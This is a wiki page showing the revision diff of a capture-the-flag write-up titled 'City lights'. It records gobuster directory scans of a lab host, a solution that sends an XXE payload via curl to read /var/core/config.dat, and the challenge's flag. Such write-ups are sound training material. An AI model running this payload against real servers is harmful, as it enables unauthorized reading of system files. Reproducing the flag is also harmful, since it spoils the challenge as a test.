City lights: Difference between revisions
From Pessin randon wiki
No edit summary |
|||
| (13 intermediate revisions by 2 users not shown) | |||
| Line 1: | Line 1: | ||
[[File:Gobuster.JPG|thumb|Root direcotry gobuster]][[File:City-lights-gobuster-blueberrylogin.JPG|thumb|Blueberrylogin gobuster]] | |||
[[File:Gobuster-admin.PNG|thumb|Gobuster admin directory]] | |||
===Description=== | ===Description=== | ||
Light in the city have been turning on and off uncontrollably. | Light in the city have been turning on and off uncontrollably. | ||
| Line 11: | Line 14: | ||
Find the location of the configuration file and bypass login mechanism to read it. | Find the location of the configuration file and bypass login mechanism to read it. | ||
=== | ===Work in progress=== | ||
*gobuster dir -u http://shared.target05:1234 -w /usr/share/wordlist/dirb/common.txt | *gobuster dir -u http://shared.target05:1234 -w /usr/share/wordlist/dirb/common.txt | ||
| Line 17: | Line 20: | ||
*gobuster dir -u http://shared.target05:1234/blueberrylogin/admin/ -w /usr/share/wordlist/dirb/common.txt | *gobuster dir -u http://shared.target05:1234/blueberrylogin/admin/ -w /usr/share/wordlist/dirb/common.txt | ||
*blueberrylogin/admin/index.html -> <code>Error on line1: /var/core/config.dat | Invalid paramtere: Flag</code> | |||
===Solution=== | ===Solution=== | ||
<code>curl -X POST --data-raw '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE replece [<!ENTITY gimme SYSTEM "file:///var/core/config.dat"> ]><root><email>&gimme;</email><password>asd</password></root>' http://shared.target05:1234/process.php</code> | |||
===Tools=== | ===Tools=== | ||
| Line 24: | Line 30: | ||
===Flag=== | ===Flag=== | ||
<code> b339a970-2d36-421d-8360-403fa7e3fb71</code> | |||
===Links=== | === Links=== | ||
*[[CTF Challenges | Back to CTF Challenges page]] | *[[CTF Challenges | Back to CTF Challenges page]] | ||
Latest revision as of 13:27, 9 September 2022
Description
Light in the city have been turning on and off uncontrollably.
Logs shows access to the controller from strange IP addresses.
Admin have tried to gain access but with no luck.
You as a security expert have been tasked to bypass the login mechanism to read a crucial configuration file that allows engineer to turn light into manual control.
Question
Find the location of the configuration file and bypass login mechanism to read it.
Work in progress
- gobuster dir -u http://shared.target05:1234 -w /usr/share/wordlist/dirb/common.txt
- gobuster dir -u http://shared.target05:1234/blueberrylogin/ -w /usr/share/wordlist/dirb/common.txt
- gobuster dir -u http://shared.target05:1234/blueberrylogin/admin/ -w /usr/share/wordlist/dirb/common.txt
- blueberrylogin/admin/index.html ->
Error on line1: /var/core/config.dat | Invalid paramtere: Flag
Solution
curl -X POST --data-raw '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE replece [<!ENTITY gimme SYSTEM "file:///var/core/config.dat"> ]><root><email>&gimme;</email><password>asd</password></root>' http://shared.target05:1234/process.php
Tools
Gobuster
Flag
b339a970-2d36-421d-8360-403fa7e3fb71
